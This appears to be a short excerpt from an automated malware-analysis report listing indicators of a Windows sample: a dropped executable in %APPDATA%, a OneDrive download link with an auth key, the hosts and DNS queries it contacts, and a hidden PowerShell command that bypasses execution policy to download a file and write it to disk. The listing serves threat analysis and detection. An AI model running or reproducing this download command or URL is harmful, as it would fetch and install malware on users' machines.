Technical Information
- '%APPDATA%\hostdyn.exe'
- https://onedrive.live.com/download?cid=409b9a5b5f0f876c&resid=409b9a5b5f0f876c%213318&authkey=ao355qcsizuhb4s
- %APPDATA%\hostdyn.exe
- 'on####ve.live.com':443
- 'k6####.#y.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK k6####.#y.files.1drv.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://onedrive.live.com/download?cid=409B9A5B5F0F876C&re...' (with hidden window)